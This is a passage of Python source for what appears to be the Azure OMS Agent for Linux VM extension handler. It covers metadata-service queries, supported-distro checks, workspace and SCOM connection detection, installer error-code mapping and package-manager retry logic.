                    open(extension_marker_path, 'w+').close()
                    hutil_log_info('Created extension marker file ' \
                                   '{0}'.format(extension_marker_path))
                except IOError as ex:
                    hutil_log_error('Error creating {0} with error: ' \
                                    '{1}'.format(extension_marker_path, ex))
                    # we are having some kind of permissions issue creating the marker file
                    output = "Couldn't create marker file"
                    exit_code = 52 # since it is a missing dependency

        # Sleep to prevent bombarding the processes, then restart all processes
        # to resolve any issues with auto-started processes from --upgrade
        time.sleep(PostOnboardingSleepSeconds)
        run_command_and_log(RestartOMSAgentServiceCommand)

        #start telemetry process if enable is successful
        start_telemetry_process()

    return exit_code, output
def remove_workspace_configuration():
    """
    This is needed to distinguish between extension removal vs extension upgrade.
    Its a workaround for waagent upgrade routine calling 'remove' on an old version
    before calling 'upgrade' on new extension version issue.
    In upgrade case, we need workspace configuration to persist when in
    remove case we need all the files be removed.
    This method will remove all the files/folders from the workspace path in Etc and Var.
    """
    public_settings, _ = get_settings()
    workspaceId = public_settings.get('workspaceId')
    # Purge the workspace tree from both /etc and /var; errors are ignored
    # (second argument to rmtree).
    for base_path in (EtcOMSAgentPath, VarOMSAgentPath):
        shutil.rmtree(os.path.join(base_path, workspaceId), True)
    hutil_log_info('Moved oms etc configuration directory and cleaned up var directory')
def is_arc_installed():
    """Return True when the Azure Arc agent daemon (himdsd) is present.

    Arc only supports VMs that have systemd, so probing the unit's status
    with systemctl is sufficient; exit status 0 means the unit exists.
    """
    status = os.system('systemctl status himdsd 1>/dev/null 2>&1')
    return status == 0
def get_arc_endpoint():
    """
    Find the endpoint for Arc Hybrid IMDS

    Reads the azcmagent systemd conf and extracts the IMDS_ENDPOINT value.
    Returns '' (and logs an error) when the file is missing or malformed.
    """
    endpoint_filepath = '/lib/systemd/system.conf.d/azcmagent.conf'
    endpoint = ''
    try:
        with open(endpoint_filepath, 'r') as f:
            data = f.read()
        # The conf contains ..."IMDS_ENDPOINT=<url>"\n...; take the URL.
        endpoint = data.split("\"IMDS_ENDPOINT=")[1].split("\"\n")[0]
    except Exception:
        # Narrowed from a bare except so SystemExit/KeyboardInterrupt are
        # not swallowed.
        hutil_log_error('Unable to load Arc IMDS endpoint from {0}'.format(endpoint_filepath))
    return endpoint
def get_imds_endpoint():
    """Pick the IMDS instance endpoint: the Arc hybrid endpoint when the
    machine is Arc-managed (falling back to the Azure endpoint when it
    cannot be read), otherwise the standard Azure endpoint."""
    azure_imds_endpoint = 'http://169.254.169.254/metadata/instance?api-version=2018-10-01'
    if not is_arc_installed():
        imds_endpoint = azure_imds_endpoint
    else:
        hutil_log_info('Arc is installed, loading Arc-specific IMDS endpoint')
        arc_endpoint = get_arc_endpoint()
        if arc_endpoint:
            imds_endpoint = arc_endpoint + '/metadata/instance?api-version=2019-08-15'
        else:
            # Fall back to the traditional IMDS endpoint; the cloud domain and VM
            # resource id detection logic are resilient to failed queries to IMDS
            imds_endpoint = azure_imds_endpoint
            hutil_log_info('Falling back to default Azure IMDS endpoint')
    hutil_log_info('Using IMDS endpoint "{0}"'.format(imds_endpoint))
    return imds_endpoint
def get_vmresourceid_from_metadata():
    """Return this VM's ARM resource id as reported by IMDS.

    Returns None for classic VMs (no 'compute' section) or when the
    metadata service cannot be queried.
    """
    imds_endpoint = get_imds_endpoint()
    req = urllib.request.Request(imds_endpoint)
    req.add_header('Metadata', 'True')
    try:
        response = json.loads(urllib.request.urlopen(req).read())
        if ('compute' not in response or response['compute'] is None):
            return None # classic vm
        # Scale-set instances carry a different resource-id shape.
        if response['compute']['vmScaleSetName']:
            return '/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.Compute/virtualMachineScaleSets/{2}/virtualMachines/{3}'.format(response['compute']['subscriptionId'],response['compute']['resourceGroupName'],response['compute']['vmScaleSetName'],response['compute']['name'])
        else:
            return '/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.Compute/virtualMachines/{2}'.format(response['compute']['subscriptionId'],response['compute']['resourceGroupName'],response['compute']['name'])
    except urllib.error.HTTPError as e:
        hutil_log_error('Request to Metadata service URL ' \
                        'failed with an HTTPError: {0}'.format(e))
        hutil_log_info('Response from Metadata service: ' \
                       '{0}'.format(e.read()))
        return None
    except Exception:
        # Narrowed from a bare except: don't swallow SystemExit/KeyboardInterrupt.
        hutil_log_error('Unexpected error from Metadata service')
        return None
def get_azure_environment_from_imds():
    """Return the azEnvironment string reported by IMDS (e.g.
    'AzurePublicCloud'), or None for classic VMs or on any query failure."""
    imds_endpoint = get_imds_endpoint()
    req = urllib.request.Request(imds_endpoint)
    req.add_header('Metadata', 'True')
    try:
        response = json.loads(urllib.request.urlopen(req).read())
        if ('compute' not in response or response['compute'] is None):
            return None # classic vm
        if ('azEnvironment' not in response['compute'] or response['compute']['azEnvironment'] is None):
            return None # classic vm
        return response['compute']['azEnvironment']
    except urllib.error.HTTPError as e:
        hutil_log_error('Request to Metadata service URL ' \
                        'failed with an HTTPError: {0}'.format(e))
        hutil_log_info('Response from Metadata service: ' \
                       '{0}'.format(e.read()))
        return None
    except Exception:
        # Narrowed from a bare except: don't swallow SystemExit/KeyboardInterrupt.
        hutil_log_error('Unexpected error from Metadata service')
        return None
def get_azure_cloud_domain():
    """Resolve the opinsights DNS domain for the cloud this VM runs in,
    falling back to the public-cloud domain when detection fails."""
    try:
        environment = get_azure_environment_from_imds()
        if environment:
            lowered = environment.lower()
            # Case-insensitive match against the known cloud names.
            for cloud, domain in CloudDomainMap.items():
                if lowered == cloud.lower():
                    hutil_log_info('Detected cloud environment "{0}" via IMDS. The domain "{1}" will be used.'.format(cloud, domain))
                    return domain
            hutil_log_info('Unknown cloud environment "{0}"'.format(environment))
    except Exception as e:
        hutil_log_error('Failed to detect cloud environment: {0}'.format(e))
    hutil_log_info('Falling back to default domain "{0}"'.format(CloudDomainMap[DefaultCloudName]))
    return CloudDomainMap[DefaultCloudName]
def retrieve_managed_workspace(vm_resource_id):
    """
    EnableAutomaticManagement has been set to true; the
    ManagedIdentity extension and the VM Resource ID are also
    required for the OneClick scenario
    Using these and the Metadata API, we will call the OMS service
    to determine what workspace ID and key to onboard to
    """
    # Check for OneClick scenario requirements:
    if not os.path.exists(ManagedIdentityExtListeningURLPath):
        raise ManagedIdentityExtMissingException

    # Determine the Tenant ID using the Metadata API
    tenant_id = get_tenant_id_from_metadata_api(vm_resource_id)
    if tenant_id is None:
        return None
    hutil_log_info('Tenant ID from Metadata API is {0}'.format(tenant_id))

    # Retrieve an OAuth token using the ManagedIdentity extension
    access_token = get_access_token(tenant_id, OAuthTokenResource)
    if access_token is None:
        return None

    # Query OMS service for the workspace info for onboarding
    return get_workspace_info_from_oms(vm_resource_id, tenant_id, access_token)
def disable():
    """
    Disable all OMS workspace processes on the VM.
    Note: disable operation times out from WAAgent at 15 minutes

    Fix over the previous revision: the two message fragments joined as
    "doesnot exist" (missing space in the string continuation).
    """
    #stop the telemetry process
    stop_telemetry_process()

    # Check if the service control script is available
    if not os.path.exists(OMSAgentServiceScript):
        log_and_exit('Disable', 1, 'OMSAgent service control script {0} does ' \
                                   'not exist. Disable cannot be called ' \
                                   'before install.'.format(OMSAgentServiceScript))
        # Defensive: log_and_exit terminates the process.
        return 1

    exit_code, output = run_command_and_log(DisableOMSAgentServiceCommand)
    return exit_code, output
# Dictionary of operations strings to methods
# Each handler returns an (exit_code, output) pair consumed by main().
operations = {'Disable' : disable,
              'Uninstall' : uninstall,
              'Install' : install,
              'Enable' : enable,
              # For update call we will only prepare the update by taking some backup of the state
              # since omsagent.py->install() will be called
              # everytime upgrade is done due to upgradeMode =
              # "UpgradeWithInstall" set in HandlerManifest
              'Update' : prepare_update,
              'Telemetry' : telemetry
              }
def parse_context(operation):
    """
    Initialize a HandlerUtil object for this operation.
    If the required modules have not been imported, this will return None.

    Raises:
        ParameterMissingException: when a required JSON key is absent from
            the handler settings.
    """
    hutil = None
    # Only build the utility when the optional Utils modules imported
    # successfully at module load time.
    if ('Utils.WAAgentUtil' in sys.modules
            and 'Utils.HandlerUtil' in sys.modules):
        try:
            # The telemetry watcher is a separate long-lived process; give
            # it its own log file so the extension log stays readable.
            logFileName = 'extension.log'
            if (operation == 'Telemetry'):
                logFileName = 'watcher.log'
            hutil = HUtil.HandlerUtility(waagent.Log, waagent.Error, logFileName=logFileName)
            hutil.do_parse_context(operation)
        # parse_context may throw KeyError if necessary JSON key is not
        # present in settings
        except KeyError as e:
            waagent_log_error('Unable to parse context with error: ' \
                              '{0}'.format(e))
            raise ParameterMissingException
    return hutil
def is_vm_supported_for_extension():
    """
    Checks if the VM this extension is running on is supported by OMSAgent
    Returns for platform.linux_distribution() vary widely in format, such as
    '7.3.1611' returned for a VM with CentOS 7, so the first provided
    digits must match
    The supported distros of the OMSAgent-for-Linux are allowed to utilize
    this VM extension. All other distros will get error code 51

    Returns:
        (vm_supported, vm_dist, vm_ver): a bool plus the detected distro
        name and version strings.

    Fix over the previous revision: the version-digit comparison used
    `is not`, which compares object identity and only works for small ints
    cached by CPython (it is a SyntaxWarning on 3.8+); it now uses `!=`.
    """
    supported_dists = {'redhat' : ['6', '7', '8'], 'red hat' : ['6', '7', '8'], 'rhel' : ['6', '7', '8'], # Red Hat
                       'centos' : ['6', '7', '8'], # CentOS
                       'oracle' : ['6', '7', '8'], 'ol': ['6', '7', '8'], # Oracle
                       'debian' : ['8', '9'], # Debian
                       'ubuntu' : ['14.04', '16.04', '18.04', '20.04'], # Ubuntu
                       'suse' : ['12', '15'], 'sles' : ['12', '15'], # SLES
                       'amzn' : ['2'] # AWS
                       }

    vm_dist, vm_ver, vm_supported = '', '', False

    # platform.linux_distribution() was removed in Python 3.8 and
    # platform.dist() in 3.8 as well; fall through to /etc/os-release.
    try:
        vm_dist, vm_ver, vm_id = platform.linux_distribution()
    except AttributeError:
        try:
            vm_dist, vm_ver, vm_id = platform.dist()
        except AttributeError:
            hutil_log_info("Falling back to /etc/os-release distribution parsing")

    # Fallback if either of the above fail; on some (especially newer)
    # distros, linux_distribution() and dist() are unreliable or deprecated
    if not vm_dist and not vm_ver:
        try:
            with open('/etc/os-release', 'r') as fp:
                for line in fp:
                    if line.startswith('ID='):
                        vm_dist = line.split('=')[1]
                        vm_dist = vm_dist.split('-')[0]
                        vm_dist = vm_dist.replace('\"', '').replace('\n', '')
                    elif line.startswith('VERSION_ID='):
                        vm_ver = line.split('=')[1]
                        vm_ver = vm_ver.replace('\"', '').replace('\n', '')
        except Exception:
            # Narrowed from a bare except.
            return vm_supported, 'Indeterminate operating system', ''

    # Find this VM distribution in the supported list
    for supported_dist in list(supported_dists.keys()):
        if not vm_dist.lower().startswith(supported_dist):
            continue

        # Check if this VM distribution version is supported
        vm_ver_split = vm_ver.split('.')
        for supported_ver in supported_dists[supported_dist]:
            supported_ver_split = supported_ver.split('.')

            # If vm_ver is at least as precise (at least as many digits) as
            # supported_ver and matches all the supported_ver digits, then
            # this VM is guaranteed to be supported
            vm_ver_match = True
            for idx, supported_ver_num in enumerate(supported_ver_split):
                try:
                    supported_ver_num = int(supported_ver_num)
                    vm_ver_num = int(vm_ver_split[idx])
                except IndexError:
                    vm_ver_match = False
                    break
                if vm_ver_num != supported_ver_num:
                    vm_ver_match = False
                    break
            if vm_ver_match:
                vm_supported = True
                break

        if vm_supported:
            break

    return vm_supported, vm_dist, vm_ver
def exit_if_vm_not_supported(operation):
    """
    Verify that this VM's distro and version are supported by the OMSAgent.

    When the platform is unsupported, report UnsupportedOperatingSystem for
    the given operation via log_and_exit; otherwise return 0.
    """
    supported, dist, ver = is_vm_supported_for_extension()
    if supported:
        return 0
    err_msg = 'Unsupported operating system: {0} {1}'.format(dist, ver)
    log_and_exit(operation, UnsupportedOperatingSystem, err_msg)
    return 0
def exit_if_openssl_unavailable(operation):
    """
    Check if the openssl commandline interface is available to use.
    If not, log the UnsupportedOpenSSL error code and exit via log_and_exit.
    Returns 0 when openssl is present.
    """
    exit_code, output = run_get_output('which openssl', True, False)
    # Fixed: use '!=' instead of 'is not' — identity comparison against an
    # int literal only works by accident of CPython small-int interning
    if exit_code != 0:
        log_and_exit(operation, UnsupportedOpenSSL, 'OpenSSL is not available')
    return 0
def check_workspace_id_and_key(workspace_id, workspace_key):
    """
    Validate formats of workspace_id and workspace_key.

    workspace_id must be a GUID (delegated to check_workspace_id);
    workspace_key must be a valid base64 string. Raises
    ParameterMissingException when either is missing and
    InvalidParameterError when the key is malformed.
    """
    check_workspace_id(workspace_id)
    # Validate that workspace_key is of the correct format (base64-encoded)
    if workspace_key is None:
        raise ParameterMissingException('Workspace key must be provided')
    try:
        encoded_key = base64.b64encode(base64.b64decode(workspace_key))
        if sys.version_info >= (3,):
            # in python 3, base64.b64encode returns bytes, so decode to str
            # for comparison
            encoded_key = encoded_key.decode()
    except (TypeError, ValueError):
        # Fixed: python 3 raises binascii.Error (a ValueError subclass) for
        # malformed base64; the original only caught TypeError, letting the
        # raw error escape to the caller
        raise InvalidParameterError('Workspace key is invalid')
    # Round-trip mismatch means the key was not canonical base64
    if encoded_key != workspace_key:
        raise InvalidParameterError('Workspace key is invalid')
def check_workspace_id(workspace_id):
    """
    Ensure the supplied workspace ID is present and matches the GUID regex.

    Raises ParameterMissingException when absent and InvalidParameterError
    when malformed.
    """
    if workspace_id is None:
        raise ParameterMissingException('Workspace ID must be provided')
    guid_matcher = re.compile(GUIDOnlyRegex, re.M)
    if guid_matcher.match(workspace_id) is None:
        raise InvalidParameterError('Workspace ID is invalid')
def detect_multiple_connections(workspace_id):
    """
    If the VM already has a workspace/SCOM configured, then we should
    disallow a new connection when stopOnMultipleConnections is used.

    Throw an exception in these cases:
    - The workspace with the given workspace_id has not been onboarded
      to the VM, but at least one other workspace has been
    - The workspace with the given workspace_id has not been onboarded
      to the VM, and the VM is connected to SCOM

    If the extension operation is connecting to an already-configured
    workspace, it is not a stopping case.
    """
    other_connection_exists = False
    if os.path.exists(OMSAdminPath):
        exit_code, output = run_get_output(WorkspaceCheckCommand,
                                           chk_err = False)
        # output may contain unicode characters not supported by ascii;
        # python 2's default encoding is ascii, so normalize through utf8.
        # Fixed: the original assigned the command result to 'utfoutput' and
        # only bound 'output' inside this python-2-only branch, so python 3
        # hit a NameError at output.strip() below.
        if sys.version_info < (3,):
            output = output.decode('utf8').encode('utf8')
        if output.strip().lower() != 'no workspace':
            for line in output.split('\n'):
                if workspace_id in line:
                    hutil_log_info('The workspace to be enabled has already ' \
                                   'been configured on the VM before; ' \
                                   'continuing despite ' \
                                   'stopOnMultipleConnections flag')
                    return
                else:
                    # Note: if scom workspace dir is created, a line containing
                    # "Workspace(SCOM Workspace): scom" will be here
                    # If any other line is here, it may start sending data later
                    other_connection_exists = True
    else:
        # omsadmin.sh is unavailable; look for workspace GUID directories
        for dir_name, sub_dirs, files in os.walk(EtcOMSAgentPath):
            for sub_dir in sub_dirs:
                sub_dir_name = os.path.basename(sub_dir)
                workspace_search = re.compile(GUIDOnlyRegex, re.M)
                if sub_dir_name == workspace_id:
                    hutil_log_info('The workspace to be enabled has already ' \
                                   'been configured on the VM before; ' \
                                   'continuing despite ' \
                                   'stopOnMultipleConnections flag')
                    return
                elif (workspace_search.match(sub_dir_name)
                        or sub_dir_name == 'scom'):
                    other_connection_exists = True
    if other_connection_exists:
        err_msg = ('This machine is already connected to some other Log ' \
                   'Analytics workspace, please set ' \
                   'stopOnMultipleConnections to false in public ' \
                   'settings or remove this property, so this machine ' \
                   'can connect to new workspaces, also it means this ' \
                   'machine will get billed multiple times for each ' \
                   'workspace it report to. ' \
                   '(LINUXOMSAGENTEXTENSION_ERROR_MULTIPLECONNECTIONS)')
        # This exception will get caught by the main method
        raise UnwantedMultipleConnectionsException(err_msg)
    else:
        detect_scom_connection()
def detect_scom_connection():
    """
    If these two conditions are met, then we can assume the VM is monitored
    by SCOM:
    1. SCOMPort is open and omiserver is listening on it
    2. scx certificate is signed by SCOM server

    To determine this, check both conditions:
    1. SCOMPort is open and omiserver is listening on it:
       /etc/omi/conf/omiserver.conf can be parsed to determine it.
    2. scx certificate is signed by SCOM server: scom cert is present at
       /etc/opt/omi/ssl/omi-host-<hostname>.pem
       (/etc/opt/microsoft/scx/ssl/scx.pem is a softlink to this). If the
       VM is monitored by SCOM then the issuer field of the certificate
       will have a value like CN=SCX-Certificate/title=<GUID>,
       DC=<SCOM server hostname>
       (e.g. CN=SCX-Certificate/title=SCX94a1f46d-2ced-4739-9b6a-1f06156ca4ac,
       DC=NEB-OM-1502733)

    Otherwise, if a scom configuration directory has been created, we
    assume SCOM is in use.

    Raises UnwantedMultipleConnectionsException when both conditions hold.
    """
    scom_port_open = None # return early once determined to be False
    cert_signed_by_scom = False

    # Try each port-detection mechanism in order of preference, stopping as
    # soon as one gives a definitive False
    if os.path.exists(OMSAdminPath):
        scom_port_open = detect_scom_using_omsadmin()
        if scom_port_open is False:
            return

    # If omsadmin.sh option is not available, use omiconfigeditor
    if (scom_port_open is None and os.path.exists(OMIConfigEditorPath)
            and os.path.exists(OMIServerConfPath)):
        scom_port_open = detect_scom_using_omiconfigeditor()
        if scom_port_open is False:
            return

    # If omiconfigeditor option is not available, directly parse omiserver.conf
    if scom_port_open is None and os.path.exists(OMIServerConfPath):
        scom_port_open = detect_scom_using_omiserver_conf()
        if scom_port_open is False:
            return

    if scom_port_open is None:
        hutil_log_info('SCOM port could not be determined to be open')
        return

    # Parse the certificate to determine if SCOM issued it
    if os.path.exists(SCOMCertPath):
        exit_if_openssl_unavailable('Install')
        cert_cmd = 'openssl x509 -in {0} -noout -text'.format(SCOMCertPath)
        cert_exit_code, cert_output = run_get_output(cert_cmd, chk_err = False,
                                                     log_cmd = False)
        # Fixed: '==' instead of 'is' for the int comparison
        if cert_exit_code == 0:
            issuer_re = re.compile(SCOMCertIssuerRegex, re.M)
            if issuer_re.search(cert_output):
                hutil_log_info('SCOM cert exists and is signed by SCOM server')
                cert_signed_by_scom = True
            else:
                hutil_log_info('SCOM cert exists but is not signed by SCOM ' \
                               'server')
        else:
            hutil_log_error('Error reading SCOM cert; cert could not be ' \
                            'determined to be signed by SCOM server')
    else:
        hutil_log_info('SCOM cert does not exist')

    if scom_port_open and cert_signed_by_scom:
        err_msg = ('This machine may already be connected to a System ' \
                   'Center Operations Manager server. Please set ' \
                   'stopOnMultipleConnections to false in public settings ' \
                   'or remove this property to allow connection to the Log ' \
                   'Analytics workspace. ' \
                   '(LINUXOMSAGENTEXTENSION_ERROR_MULTIPLECONNECTIONS)')
        raise UnwantedMultipleConnectionsException(err_msg)
def detect_scom_using_omsadmin():
    """
    This method assumes that OMSAdminPath exists; if packages have not
    been installed yet, this may not exist.
    Returns True if omsadmin.sh indicates that the SCOM port is open,
    False if it indicates the port is closed, and None (implicitly) when
    the answer could not be determined (e.g. older omsadmin.sh versions).
    """
    omsadmin_cmd = '{0} -o'.format(OMSAdminPath)
    exit_code, output = run_get_output(omsadmin_cmd, False, False)
    # Guard against older omsadmin.sh versions that lack the -o option
    if ('illegal option' not in output.lower()
            and 'unknown option' not in output.lower()):
        # Fixed: '==' instead of 'is' for int comparisons
        if exit_code == 0:
            hutil_log_info('According to {0}, SCOM port is ' \
                           'open'.format(omsadmin_cmd))
            return True
        elif exit_code == 1:
            hutil_log_info('According to {0}, SCOM port is not ' \
                           'open'.format(omsadmin_cmd))
            return False
def detect_scom_using_omiconfigeditor():
    """
    This method assumes that the relevant files exist.
    Returns True if omiconfigeditor indicates that the SCOM port is open,
    False if closed, and None (implicitly) when it could not be determined
    (e.g. older omiconfigeditor versions).
    """
    omi_cmd = '{0} httpsport -q {1} < {2}'.format(OMIConfigEditorPath,
                                                  SCOMPort, OMIServerConfPath)
    exit_code, output = run_get_output(omi_cmd, False, False)
    # Guard against older omiconfigeditor versions that lack this option
    if ('illegal option' not in output.lower()
            and 'unknown option' not in output.lower()):
        # Fixed: '==' instead of 'is' for int comparisons
        if exit_code == 0:
            hutil_log_info('According to {0}, SCOM port is ' \
                           'open'.format(omi_cmd))
            return True
        elif exit_code == 1:
            hutil_log_info('According to {0}, SCOM port is not ' \
                           'open'.format(omi_cmd))
            return False
def detect_scom_using_omiserver_conf():
    """
    This method assumes that the relevant files exist.
    Returns True when omiserver.conf lists SCOMPort among its httpsport
    values, False otherwise.
    """
    with open(OMIServerConfPath, 'r') as conf_file:
        conf_text = conf_file.read()

    # Look for a line of the form: httpsport = <port>[,<port>...]
    httpsport_match = re.search(r'^[\s]*httpsport[\s]*=(.*)$', conf_text, re.M)
    if httpsport_match is not None and httpsport_match.group(1) is not None:
        port_values = httpsport_match.group(1).replace(',', ' ').split(' ')
        if str(SCOMPort) in port_values:
            hutil_log_info('SCOM port is listed in ' \
                           '{0}'.format(OMIServerConfPath))
            return True

    hutil_log_info('SCOM port is not listed in ' \
                   '{0}'.format(OMIServerConfPath))
    return False
def run_command_and_log(cmd, check_error = True, log_cmd = True):
    """
    Run the provided shell command and log its output, including stdout and
    stderr.
    The output should not contain any PII, but the command might. In this case,
    log_cmd should be set to False.

    Known failure signatures are translated into the extension's documented
    error codes (52 = missing dependency / environment issue, 53 =
    configuration error) with a friendlier message; see the error-code wiki:
    https://github.com/Azure/azure-marketplace/wiki/Extension-Build-Notes-Best-Practices#error-codes-and-messages-output-to-stderr
    """
    exit_code, output = run_get_output(cmd, check_error, log_cmd)
    if log_cmd:
        hutil_log_info('Output of command "{0}": \n{1}'.format(cmd.rstrip(), output))
    else:
        hutil_log_info('Output: \n{0}'.format(output))
    # also write output to STDERR since WA agent uploads that to Azlinux Kusto DB
    # take only the last 500 characters as extension cuts off after that
    # Fixed: all int comparisons below use ==/!= instead of the original
    # 'is'/'is not', which relied on CPython small-int interning
    try:
        if exit_code != 0:
            sys.stderr.write(output[-500:])

            if exit_code == 17:
                # For details, check logs in /var/log/azure/Microsoft.EnterpriseCloud.Monitoring.OmsAgentForLinux/extension.log
                if "Failed dependencies:" in output:
                    # 52 is the exit code for missing dependency
                    exit_code = 52
                    output = "Installation failed due to missing dependencies. For details, check logs in /var/log/azure/Microsoft.EnterpriseCloud.Monitoring.OmsAgentForLinux/extension.log"
                elif "waiting for transaction lock" in output or "dpkg: error processing package systemd" in output or "dpkg-deb" in output or "dpkg:" in output:
                    exit_code = 52
                    output = "There seems to be an issue in your package manager dpkg or rpm. For details, check logs in /var/log/azure/Microsoft.EnterpriseCloud.Monitoring.OmsAgentForLinux/extension.log"
                elif "Errors were encountered while processing:" in output:
                    exit_code = 52
                    output = "There seems to be an issue while processing triggers in systemd. For details, check logs in /var/log/azure/Microsoft.EnterpriseCloud.Monitoring.OmsAgentForLinux/extension.log"
                elif "Cannot allocate memory" in output:
                    exit_code = 52
                    output = "There seems to be insufficient memory for the installation. For details, check logs in /var/log/azure/Microsoft.EnterpriseCloud.Monitoring.OmsAgentForLinux/extension.log"
            elif exit_code == 19:
                # OMI (19) happens to be the first package we install; rpmdb
                # failures at this point indicate a system issue
                if "rpmdb" in output or "cannot open Packages database" in output or "dpkg (subprocess): cannot set security execution context for maintainer script" in output or "error: dpkg status database is locked by another process" in output:
                    exit_code = 52
                    output = "There seems to be an issue in your package manager dpkg or rpm. For details, check logs in /var/log/azure/Microsoft.EnterpriseCloud.Monitoring.OmsAgentForLinux/extension.log"
                elif "libc6 is not installed" in output or "libpam-runtime is not installed" in output or "exited with status 52" in output or "/bin/sh is needed" in output:
                    exit_code = 52
                    output = "Installation failed due to missing dependencies. For details, check logs in /var/log/azure/Microsoft.EnterpriseCloud.Monitoring.OmsAgentForLinux/extension.log"
            elif exit_code == 33:
                # Enable failures
                if "Permission denied" in output:
                    exit_code = 52
                    output = "Installation failed due to insufficient permissions. Please ensure omsagent user is part of the sudoer file and has sufficient permissions to install. For details, check logs in /var/log/azure/Microsoft.EnterpriseCloud.Monitoring.OmsAgentForLinux/extension.log"
            elif exit_code == 5:
                # 53 is the exit code for configuration errors
                if "Reason: InvalidWorkspaceKey" in output or "Reason: MissingHeader" in output:
                    exit_code = 53
                    output = "Installation failed due to incorrect workspace key. Please check if the workspace key is correct. For details, check logs in /var/log/azure/Microsoft.EnterpriseCloud.Monitoring.OmsAgentForLinux/extension.log"
            elif exit_code == 8:
                # 53 is the exit code for configuration errors
                if "Check the correctness of the workspace ID and shared key" in output:
                    exit_code = 53
                    output = "Installation failed due to incorrect workspace key. Please check if the workspace key is correct. For details, check logs in /var/log/azure/Microsoft.EnterpriseCloud.Monitoring.OmsAgentForLinux/extension.log"

            # Generic fallbacks for any remaining untranslated failure
            if exit_code != 0 and exit_code != 52:
                if "dpkg:" in output or "dpkg :" in output or "rpmdb:" in output or "rpm.lock" in output:
                    exit_code = 52
                    output = "There seems to be an issue in your package manager dpkg or rpm. For details, check logs in /var/log/azure/Microsoft.EnterpriseCloud.Monitoring.OmsAgentForLinux/extension.log"
                if "conflicts with file from package" in output or "Failed dependencies:" in output or "Please install curl" in output or "is needed by" in output or "check_version_installable" in output or "Error: curl was not installed" in output or "Please install the ctypes package" in output or "gpg is not installed" in output:
                    exit_code = 52
                    output = "Installation failed due to missing dependencies. For details, check logs in /var/log/azure/Microsoft.EnterpriseCloud.Monitoring.OmsAgentForLinux/extension.log"
                if "Permission denied" in output:
                    exit_code = 52
                    output = "Installation failed due to insufficient permissions. Please ensure omsagent user is part of the sudoer file and has sufficient permissions to install. For details, check logs in /var/log/azure/Microsoft.EnterpriseCloud.Monitoring.OmsAgentForLinux/extension.log"
    except:
        hutil_log_info('Failed to write output to STDERR')
    return exit_code, output
def run_command_with_retries(cmd, retries, retry_check, final_check = None,
                             check_error = True, log_cmd = True,
                             initial_sleep_time = InitialRetrySleepSeconds,
                             sleep_increase_factor = 1):
    """
    Run cmd, retrying up to `retries` additional times when retry_check
    says so, and return the final exit code.

    retry_check(exit_code, output) must return a tuple of
    (should_retry, retry_message, retry_verbosely); when retry_verbosely
    is True the next attempt appends the standard -v flag to cmd.
    final_check(exit_code, output), when provided, may translate the exit
    code after retries are exhausted. Sleeps initial_sleep_time between
    attempts, scaled by sleep_increase_factor each time.
    """
    sleep_time = initial_sleep_time
    verbose = False
    for _ in range(retries + 1):
        attempt_cmd = cmd + ' -v' if verbose else cmd
        exit_code, output = run_command_and_log(attempt_cmd, check_error,
                                                log_cmd)
        should_retry, retry_message, verbose = retry_check(exit_code, output)
        if not should_retry:
            break
        hutil_log_info(retry_message)
        time.sleep(sleep_time)
        sleep_time *= sleep_increase_factor
    if final_check is not None:
        exit_code = final_check(exit_code, output)
    return exit_code
def run_command_with_retries_output(cmd, retries, retry_check, final_check = None,
                                    check_error = True, log_cmd = True,
                                    initial_sleep_time = InitialRetrySleepSeconds,
                                    sleep_increase_factor = 1):
    """
    Run cmd, retrying up to `retries` additional times when retry_check
    says so, and return the final (exit_code, output) pair.

    retry_check(exit_code, output) must return a tuple of
    (should_retry, retry_message, retry_verbosely); when retry_verbosely
    is True the next attempt appends the standard -v flag to cmd.
    final_check(exit_code, output), when provided, may translate the exit
    code after retries are exhausted. Sleeps initial_sleep_time between
    attempts, scaled by sleep_increase_factor each time.
    """
    sleep_time = initial_sleep_time
    verbose = False
    for _ in range(retries + 1):
        attempt_cmd = cmd + ' -v' if verbose else cmd
        exit_code, output = run_command_and_log(attempt_cmd, check_error,
                                                log_cmd)
        should_retry, retry_message, verbose = retry_check(exit_code, output)
        if not should_retry:
            break
        hutil_log_info(retry_message)
        time.sleep(sleep_time)
        sleep_time *= sleep_increase_factor
    if final_check is not None:
        exit_code = final_check(exit_code, output)
    return exit_code, output
def is_dpkg_locked(exit_code, output):
    """
    Return True when a failed command's output indicates the dpkg database
    is locked (e.g. 'dpkg status database is locked by another process').
    """
    # Fixed: '!=' instead of 'is not' — identity comparison against an int
    # literal relies on CPython small-int interning
    if exit_code != 0:
        dpkg_locked_re = re.compile(r'^.*dpkg.+lock.*$', re.M)
        if dpkg_locked_re.search(output):
            return True
    return False
def was_curl_found(exit_code, output):
    """
    Returns False if exit_code indicates that curl was not installed; this can
    occur when package lists need to be updated, or when some archives are
    out-of-date.
    """
    # Fixed: '!=' instead of 'is' — identity comparison of int constants is
    # unreliable outside CPython's small-int cache
    return exit_code != InstallErrorCurlNotInstalled
def retry_skip(exit_code, output):
    """
    Retry-check callback that never retries: no retry, no message, and no
    verbose re-run.
    """
    return False, '', False
def retry_if_dpkg_locked_or_curl_is_not_found(exit_code, output):
    """
    Some commands fail because the package manager is locked (apt-get/dpkg
    only); this will allow retries on failing commands.
    Sometimes curl's dependencies (i.e. libcurl) are not installed; if this
    is the case on a VM with apt-get, 'apt-get -f install' should be run.
    Sometimes curl is not installed and is also not found in the package list;
    if this is the case on a VM with apt-get, update the package list.
    Returns (should_retry, retry_message, retry_verbosely).
    """
    retry_verbosely = False
    dpkg_locked = is_dpkg_locked(exit_code, output)
    curl_found = was_curl_found(exit_code, output)
    apt_get_exit_code, apt_get_output = run_get_output('which apt-get',
                                                       chk_err = False,
                                                       log_cmd = False)
    if dpkg_locked:
        return True, 'Retrying command because package manager is locked.', \
               retry_verbosely
    # Fixed: '==' instead of 'is' for int comparisons; also lowercased the
    # 'unmet dependencies' needle — the original compared an uppercase
    # literal against output.lower(), which could never match
    elif (not curl_found and apt_get_exit_code == 0 and
            ('apt-get -f install' in output
            or 'unmet dependencies' in output.lower())):
        hutil_log_info('Installing all dependencies of curl:')
        run_command_and_log('apt-get -f install')
        return True, 'Retrying command because curl and its dependencies ' \
                     'needed to be installed', retry_verbosely
    elif not curl_found and apt_get_exit_code == 0:
        hutil_log_info('Updating package lists to make curl available')
        run_command_and_log('apt-get update')
        return True, 'Retrying command because package lists needed to be ' \
                     'updated', retry_verbosely
    else:
        return False, '', False
def final_check_if_dpkg_locked(exit_code, output):
    """
    Translate the exit code to DPKGLockedErrorCode when dpkg is still
